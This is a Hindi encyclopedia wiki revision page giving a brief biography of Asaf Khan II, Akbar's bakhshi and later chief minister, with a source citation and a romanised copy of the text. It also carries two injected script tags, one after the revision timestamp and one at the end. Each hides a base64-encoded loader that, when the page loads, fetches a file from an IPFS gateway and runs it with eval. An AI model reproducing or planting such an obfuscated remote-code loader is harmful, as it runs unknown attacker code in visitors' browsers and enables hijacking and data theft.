Difference between revisions of "आसफ खाँ द्वितीय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''आसफ खाँ द्वितीय''' मिर्जा वदीउज्जमाँ के पुत्र थे और...' के साथ नया पृष्ठ बनाया)
 
 
Line 1: Line 1:
 +
{{बहुविकल्पी|आसफ़ ख़ाँ}}
 
'''आसफ खाँ द्वितीय''' मिर्जा वदीउज्जमाँ के पुत्र थे और इनका जन्म काजवीन्‌ नामक स्थान पर हुआ था। इनका असल नाम मिर्ज़ा जाफरबेग था और लोग इन्हें अलिफ खां भी कहते थे। सन्‌ 1577 ई. में ये अपने मामा के पास भारत आए। इनके मामा अकबर के वजीर थे और उनकी उपाधि आसफ खां थी। मामा की सिफरिश पर अकबर ने इनकी नियुक्ति 'बख्शी' के पद पर कर दी। मामा की मृत्यु के पश्चात्‌ इन्हें आसफ खां की उपाधि मिल गई। ये कवि भी थे और सुपंडित भी। मुल्ला अहमद के मरने पर अकबर के आदेश से इन्होंने 'तारीख अलफ़ी' नामक इतिहास ग्रंथ लिखा। 1598 ई. में अकबर ने इन्हें 'वजीर आला' (प्रधान मंत्री) बना दिया। जहांगीर के शासनकाल में भी इन्हें पर्याप्त सम्मान मिला। 'शीरीं या खुसरी' नामक उत्कृष्ट काव्य की रचना इन्होंने ही की। 1612 ई. में इनका देहावसान हो गया।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी विश्वकोश, खण्ड 1|लेखक= |अनुवादक= |आलोचक= |प्रकाशक= नागरी प्रचारिणी सभा, वाराणसी|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=461 |url=}}</ref>  
 
'''आसफ खाँ द्वितीय''' मिर्जा वदीउज्जमाँ के पुत्र थे और इनका जन्म काजवीन्‌ नामक स्थान पर हुआ था। इनका असल नाम मिर्ज़ा जाफरबेग था और लोग इन्हें अलिफ खां भी कहते थे। सन्‌ 1577 ई. में ये अपने मामा के पास भारत आए। इनके मामा अकबर के वजीर थे और उनकी उपाधि आसफ खां थी। मामा की सिफरिश पर अकबर ने इनकी नियुक्ति 'बख्शी' के पद पर कर दी। मामा की मृत्यु के पश्चात्‌ इन्हें आसफ खां की उपाधि मिल गई। ये कवि भी थे और सुपंडित भी। मुल्ला अहमद के मरने पर अकबर के आदेश से इन्होंने 'तारीख अलफ़ी' नामक इतिहास ग्रंथ लिखा। 1598 ई. में अकबर ने इन्हें 'वजीर आला' (प्रधान मंत्री) बना दिया। जहांगीर के शासनकाल में भी इन्हें पर्याप्त सम्मान मिला। 'शीरीं या खुसरी' नामक उत्कृष्ट काव्य की रचना इन्होंने ही की। 1612 ई. में इनका देहावसान हो गया।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी विश्वकोश, खण्ड 1|लेखक= |अनुवादक= |आलोचक= |प्रकाशक= नागरी प्रचारिणी सभा, वाराणसी|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=461 |url=}}</ref>  
  

Latest revision as of 12:24, 24 June 2018

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

asaph khaan dvitiy mirja vadiujjamaan ke putr the aur inaka janm kajavinh‌ namak sthan par hua tha. inaka asal nam mirza japharabeg tha aur log inhean aliph khaan bhi kahate the. sanh‌ 1577 ee. mean ye apane mama ke pas bharat ae. inake mama akabar ke vajir the aur unaki upadhi asaph khaan thi. mama ki sipharish par akabar ne inaki niyukti 'bakhshi' ke pad par kar di. mama ki mrityu ke pashchath‌ inhean asaph khaan ki upadhi mil gee. ye kavi bhi the aur supandit bhi. mulla ahamad ke marane par akabar ke adesh se inhoanne 'tarikh alafi' namak itihas granth likha. 1598 ee. mean akabar ne inhean 'vajir ala' (pradhan mantri) bana diya. jahaangir ke shasanakal mean bhi inhean paryapt samman mila. 'shirian ya khusari' namak utkrisht kavy ki rachana inhoanne hi ki. 1612 ee. mean inaka dehavasan ho gaya.[1]



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. hindi vishvakosh, khand 1 |prakashak: nagari pracharini sabha, varanasi |sankalan: bharat diskavari pustakalay |prishth sankhya: 461 |

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>